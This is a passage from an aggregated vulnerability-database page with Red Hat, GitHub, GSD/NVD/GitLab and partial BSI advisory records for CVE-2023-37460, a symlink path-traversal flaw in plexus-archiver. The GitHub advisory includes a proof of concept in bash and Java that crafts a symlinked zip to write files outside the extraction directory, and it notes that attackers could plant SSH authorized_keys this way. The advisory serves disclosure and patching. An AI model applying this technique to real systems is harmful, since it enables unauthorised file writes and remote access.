"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-37460"
},
{
"category": "external",
"summary": "RHBZ#2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37460"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460"
},
{
"category": "external",
"summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"category": "external",
"summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/",
"url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/"
}
],
"release_date": "2023-07-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-11-13T09:42:49+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:6886"
},
{
"category": "workaround",
"details": "No mitigations are available for this issue.",
"product_ids": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver"
}
]
}
ghsa-wh3p-fphp-9h2m
Vulnerability from github
Published
2023-07-25 17:20
Modified
2023-08-03 17:59
Severity ?
Summary
Arbitrary File Creation in AbstractUnArchiver
Details
Summary
Using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution.
Description
When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the resolveFile() function will return the symlink's source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later Files.newOutputStream(), that follows symlinks by default, will actually write the entry's content to the symlink's target.
Impact
Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution.
Technical Details
In AbstractUnArchiver.java: ```java protected void extractFile( final File srcF, final File dir, final InputStream compressedInputStream, String entryName, final Date entryDate, final boolean isDirectory, final Integer mode, String symlinkDestination, final FileMapper[] fileMappers) throws IOException, ArchiverException { ... // Hmm. Symlinks re-evaluate back to the original file here. Unsure if this is a good thing... final File targetFileName = FileUtils.resolveFile( dir, entryName );
// Make sure that the resolved path of the extracted file doesn't escape the destination directory
// getCanonicalFile().toPath() is used instead of getCanonicalPath() (returns String),
// because "/opt/directory".startsWith("/opt/dir") would return false negative.
Path canonicalDirPath = dir.getCanonicalFile().toPath();
Path canonicalDestPath = targetFileName.getCanonicalFile().toPath();
if ( !canonicalDestPath.startsWith( canonicalDirPath ) )
{
throw new ArchiverException( "Entry is outside of the target directory (" + entryName + ")" );
}
try
{
...
if ( !StringUtils.isEmpty( symlinkDestination ) )
{
SymlinkUtils.createSymbolicLink( targetFileName, new File( symlinkDestination ) );
}
else if ( isDirectory )
{
targetFileName.mkdirs();
}
else
{
try ( OutputStream out = Files.newOutputStream( targetFileName.toPath() ) )
{
IOUtil.copy( compressedInputStream, out );
}
}
targetFileName.setLastModified( entryDate.getTime() );
if ( !isIgnorePermissions() && mode != null && !isDirectory )
{
ArchiveEntryUtils.chmod( targetFileName, mode );
}
}
catch ( final FileNotFoundException ex )
{
getLogger().warn( "Unable to expand to file " + targetFileName.getPath() );
}
}
``` When given an entry that already exists in dir as a symbolic link whose target does not exist - the symbolic link’s target will be created and the content of the archive’s entry will be written to it.
That’s because the way FileUtils.resolveFile() works: ```java public static File resolveFile( final File baseFile, String filename ) { ... try { file = file.getCanonicalFile(); } catch ( final IOException ioe ) { // nop }
return file;
}
File.getCanonicalFile() (tested with the most recent version of openjdk (22.2) on Unix) will eventually call [JDK_Canonicalize()](https://github.com/openjdk/jdk/blob/jdk-22%2B2/src/java.base/unix/native/libjava/canonicalize_md.c#LL48C1-L68C69):cpp
JNIEXPORT int
JDK_Canonicalize(const char orig, char out, int len)
{
if (len < PATH_MAX) {
errno = EINVAL;
return -1;
}
if (strlen(orig) > PATH_MAX) {
errno = ENAMETOOLONG;
return -1;
}
/* First try realpath() on the entire path */
if (realpath(orig, out)) {
/* That worked, so return it */
collapse(out);
return 0;
} else {
/* Something's bogus in the original path, so remove names from the end
until either some subpath works or we run out of names */
...
realpath() returns the destination path for a symlink, if this destination exists. But if it doesn’t -
it will return NULL and we will reach the else’s clause, which will eventually return the path of the symlink itself.
So in case the entry is already exists as a symbolic link to a non-existing file - file.getCanonicalFile() will return the absolute path of the symbolic link and this check will pass:java
Path canonicalDirPath = dir.getCanonicalFile().toPath();
Path canonicalDestPath = targetFileName.getCanonicalFile().toPath();
if ( !canonicalDestPath.startsWith( canonicalDirPath ) ) { throw new ArchiverException( "Entry is outside of the target directory (" + entryName + ")" ); } ``` Later, the content of the entry will be written to the symbolic link’s destination and by doing so will create the destination file and fill it with the entry’s content.
Arbitrary file creation can lead to remote code execution. For example, if there is an SSH server on the victim’s machine and ~/.ssh/authorized_keys does not exist - creating this file and filling it with an attacker's public key will allow the attacker to connect the SSH server without knowing the victim’s password.
PoC
We created a zip as following:
bash
$ ln -s /tmp/target entry1
$ echo -ne “content” > entry2
$ zip --symlinks archive.zip entry1 entry2
The following command will change the name of entry2 to entry1:
bash
$ sed -i 's/entry2/entry1/' archive.zip
We put archive.zip in /tmp and create a dir for the extracted files:
bash
$ cp archive.zip /tmp
$ mkdir /tmp/extracted_files
Next, we wrote a java code that opens archive.zip:
```java
package com.example;
import java.io.File;
import org.codehaus.plexus.archiver.zip.ZipUnArchiver;
public class App
{
public static void main( String[] args )
{
ZipUnArchiver unArchiver = new ZipUnArchiver(new File("/tmp/archive.zip"));
unArchiver.setDestDirectory(new File("/tmp/extracted_files"));
unArchiver.extract();
}
}
After running this java code, we can see that /tmp/target contains the string “content”:
$ cat /tmp/target
content
```
Notice that although we used here a duplicated entry name in the same archive, this attack can be performed also by two different archives - one that contains a symlink and another archive that contains a regular file with the same entry name as the symlink.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.codehaus.plexus:plexus-archiver"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.8.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-37460"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2023-07-25T17:20:43Z",
"nvd_published_at": "2023-07-25T20:15:13Z",
"severity": "HIGH"
},
"details": "### Summary\n\nUsing AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution.\n\n### Description\nWhen extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the resolveFile() function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later Files.newOutputStream(), that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target.\n\n### Impact\nWhoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution.\n\n### Technical Details\n\nIn [AbstractUnArchiver.java](https://github.com/codehaus-plexus/plexus-archiver/blob/plexus-archiver-4.7.1/src/main/java/org/codehaus/plexus/archiver/AbstractUnArchiver.java#L342):\n```java\nprotected void extractFile( final File srcF, final File dir, final InputStream compressedInputStream, String entryName, final Date entryDate, final boolean isDirectory, final Integer mode, String symlinkDestination, final FileMapper[] fileMappers)\n throws IOException, ArchiverException\n {\n ...\n // Hmm. Symlinks re-evaluate back to the original file here. Unsure if this is a good thing...\n final File targetFileName = FileUtils.resolveFile( dir, entryName );\n\n\n // Make sure that the resolved path of the extracted file doesn\u0027t escape the destination directory\n // getCanonicalFile().toPath() is used instead of getCanonicalPath() (returns String),\n // because \"/opt/directory\".startsWith(\"/opt/dir\") would return false negative.\n Path canonicalDirPath = dir.getCanonicalFile().toPath();\n Path canonicalDestPath = targetFileName.getCanonicalFile().toPath();\n\n\n if ( !canonicalDestPath.startsWith( canonicalDirPath ) )\n {\n throw new ArchiverException( \"Entry is outside of the target directory (\" + entryName + \")\" );\n }\n\n\n try\n {\n ...\n if ( !StringUtils.isEmpty( symlinkDestination ) )\n {\n SymlinkUtils.createSymbolicLink( targetFileName, new File( symlinkDestination ) );\n }\n else if ( isDirectory )\n {\n targetFileName.mkdirs();\n }\n else\n {\n try ( OutputStream out = Files.newOutputStream( targetFileName.toPath() ) )\n {\n IOUtil.copy( compressedInputStream, out );\n }\n }\n\n\n targetFileName.setLastModified( entryDate.getTime() );\n\n\n if ( !isIgnorePermissions() \u0026\u0026 mode != null \u0026\u0026 !isDirectory )\n {\n ArchiveEntryUtils.chmod( targetFileName, mode );\n }\n }\n catch ( final FileNotFoundException ex )\n {\n getLogger().warn( \"Unable to expand to file \" + targetFileName.getPath() );\n }\n }\n```\nWhen given an entry that already exists in dir as a symbolic link whose target does not exist - the symbolic link\u2019s target will be created and the content of the archive\u2019s entry will be written to it.\n\nThat\u2019s because the way FileUtils.resolveFile() works:\n```java\npublic static File resolveFile( final File baseFile, String filename )\n {\n ...\n try\n {\n file = file.getCanonicalFile();\n }\n catch ( final IOException ioe )\n {\n // nop\n }\n\n\n return file;\n }\n```\nFile.getCanonicalFile() (tested with the most recent version of openjdk (22.2) on Unix) will eventually call [JDK_Canonicalize()](https://github.com/openjdk/jdk/blob/jdk-22%2B2/src/java.base/unix/native/libjava/canonicalize_md.c#LL48C1-L68C69):\n```cpp\nJNIEXPORT int\nJDK_Canonicalize(const char *orig, char *out, int len)\n{\n if (len \u003c PATH_MAX) {\n errno = EINVAL;\n return -1;\n }\n\n if (strlen(orig) \u003e PATH_MAX) {\n errno = ENAMETOOLONG;\n return -1;\n }\n\n /* First try realpath() on the entire path */\n if (realpath(orig, out)) {\n /* That worked, so return it */\n collapse(out);\n return 0;\n } else {\n /* Something\u0027s bogus in the original path, so remove names from the end\n until either some subpath works or we run out of names */\n ...\n```\nrealpath() returns the destination path for a symlink, if this destination exists. But if it doesn\u2019t - \nit will return NULL and we will reach the else\u2019s clause, which will eventually return the path of the symlink itself.\nSo in case the entry is already exists as a symbolic link to a non-existing file - file.getCanonicalFile() will return the absolute path of the symbolic link and this check will pass:\n```java\nPath canonicalDirPath = dir.getCanonicalFile().toPath();\nPath canonicalDestPath = targetFileName.getCanonicalFile().toPath();\n\n\nif ( !canonicalDestPath.startsWith( canonicalDirPath ) )\n{\n throw new ArchiverException( \"Entry is outside of the target directory (\" + entryName + \")\" );\n}\n```\nLater, the content of the entry will be written to the symbolic link\u2019s destination and by doing so will create the destination file and fill it with the entry\u2019s content.\n\nArbitrary file creation can lead to remote code execution. For example, if there is an SSH server on the victim\u2019s machine and ~/.ssh/authorized_keys does not exist - creating this file and filling it with an attacker\u0027s public key will allow the attacker to connect the SSH server without knowing the victim\u2019s password.\n\n### PoC\nWe created a zip as following:\n```bash\n$ ln -s /tmp/target entry1\n$ echo -ne \u201ccontent\u201d \u003e entry2\n$ zip --symlinks archive.zip entry1 entry2\n```\nThe following command will change the name of entry2 to entry1:\n```bash\n$ sed -i \u0027s/entry2/entry1/\u0027 archive.zip\n```\nWe put archive.zip in /tmp and create a dir for the extracted files:\n```bash\n$ cp archive.zip /tmp\n$ mkdir /tmp/extracted_files\n```\nNext, we wrote a java code that opens archive.zip:\n```java\npackage com.example;\n\nimport java.io.File;\n\nimport org.codehaus.plexus.archiver.zip.ZipUnArchiver;\n\npublic class App \n{\n public static void main( String[] args )\n {\n ZipUnArchiver unArchiver = new ZipUnArchiver(new File(\"/tmp/archive.zip\"));\n unArchiver.setDestDirectory(new File(\"/tmp/extracted_files\"));\n unArchiver.extract(); \n }\n}\n```\nAfter running this java code, we can see that /tmp/target contains the string \u201ccontent\u201d:\n```\n$ cat /tmp/target\ncontent\n```\nNotice that although we used here a duplicated entry name in the same archive, this attack can be performed also by two different archives - one that contains a symlink and another archive that contains a regular file with the same entry name as the symlink.",
"id": "GHSA-wh3p-fphp-9h2m",
"modified": "2023-08-03T17:59:29Z",
"published": "2023-07-25T17:20:43Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460"
},
{
"type": "WEB",
"url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2"
},
{
"type": "PACKAGE",
"url": "https://github.com/codehaus-plexus/plexus-archiver"
},
{
"type": "WEB",
"url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Arbitrary File Creation in AbstractUnArchiver"
}
gsd-2023-37460
Vulnerability from gsd
Modified
2023-12-13 01:20
Details
Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink's source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry's content to the symlink's target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2023-37460",
"id": "GSD-2023-37460"
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2023-37460"
],
"details": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.",
"id": "GSD-2023-37460",
"modified": "2023-12-13T01:20:24.249036Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2023-37460",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "plexus-archiver",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "\u003c 4.8.0"
}
]
}
}
]
},
"vendor_name": "codehaus-plexus"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue."
}
]
},
"impact": {
"cvss": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"cweId": "CWE-22",
"lang": "eng",
"value": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
}
]
},
{
"description": [
{
"cweId": "CWE-61",
"lang": "eng",
"value": "CWE-61: UNIX Symbolic Link (Symlink) Following"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"refsource": "MISC",
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2",
"refsource": "MISC",
"url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0",
"refsource": "MISC",
"url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0"
}
]
},
"source": {
"advisory": "GHSA-wh3p-fphp-9h2m",
"discovery": "UNKNOWN"
}
},
"gitlab.com": {
"advisories": [
{
"affected_range": "(,4.8.0)",
"affected_versions": "All versions before 4.8.0",
"cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cwe_ids": [
"CWE-1035",
"CWE-22",
"CWE-937"
],
"date": "2023-08-03",
"description": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.",
"fixed_versions": [
"4.8.0"
],
"identifier": "CVE-2023-37460",
"identifiers": [
"CVE-2023-37460",
"GHSA-wh3p-fphp-9h2m"
],
"not_impacted": "All versions starting from 4.8.0",
"package_slug": "maven/org.codehaus.plexus/plexus-archiver",
"pubdate": "2023-07-25",
"solution": "Upgrade to version 4.8.0 or above.",
"title": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2023-37460",
"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0",
"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2"
],
"uuid": "ded6bbbc-3ead-4282-bad5-7314a91bf82c"
}
]
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:codehaus-plexus:plexus-archiver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.8.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2023-37460"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
},
{
"lang": "en",
"value": "CWE-61"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0",
"refsource": "MISC",
"tags": [
"Release Notes"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"refsource": "MISC",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2",
"refsource": "MISC",
"tags": [
"Patch"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2"
}
]
}
},
"impact": {
"baseMetricV3": {
"cvssV3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9
}
},
"lastModifiedDate": "2023-08-03T13:52Z",
"publishedDate": "2023-07-25T20:15Z"
}
}
}
wid-sec-w-2023-2368
Vulnerability from csaf_certbund
Published
2023-09-14 22:00
Modified
2024-01-07 23:00
Summary
IBM Operational Decision Manager: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
IBM Operational Decision Manager ist Software für die Integration von Geschäftsereignissen und Geschäftsregeln, um Entscheidungen über verschiedene Prozesse und Anwendungen hinweg zu automatisieren.
Angriff
Ein entfernter authentifizierter Angreifer kann mehrere Schwachstellen in IBM Operational Decision Manager ausnutzen, um Sicherheitsmaßnahmen zu umgehen, beliebigen Code auszuführen, einen Denial-of-Service-Zustand zu verursachen oder vertrauliche Informationen offenzulegen.
Betroffene Betriebssysteme
- Linux
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "IBM Operational Decision Manager ist Software f\u00fcr die Integration von Gesch\u00e4ftsereignissen und Gesch\u00e4ftsregeln, um Entscheidungen \u00fcber verschiedene Prozesse und Anwendungen hinweg zu automatisieren.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter authentifizierter Angreifer kann mehrere Schwachstellen in IBM Operational Decision Manager ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, beliebigen Code auszuf\u00fchren, einen Denial-of-Service-Zustand zu verursachen oder vertrauliche Informationen offenzulegen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2023-2368 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2023/wid-sec-w-2023-2368.json"
},
{
"category": "self",
"summary": "WID-SEC-2023-2368 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-2368"
},
{
"category": "external",
"summary": "IBM Security Bulletin - 7032928 vom 2023-09-14",
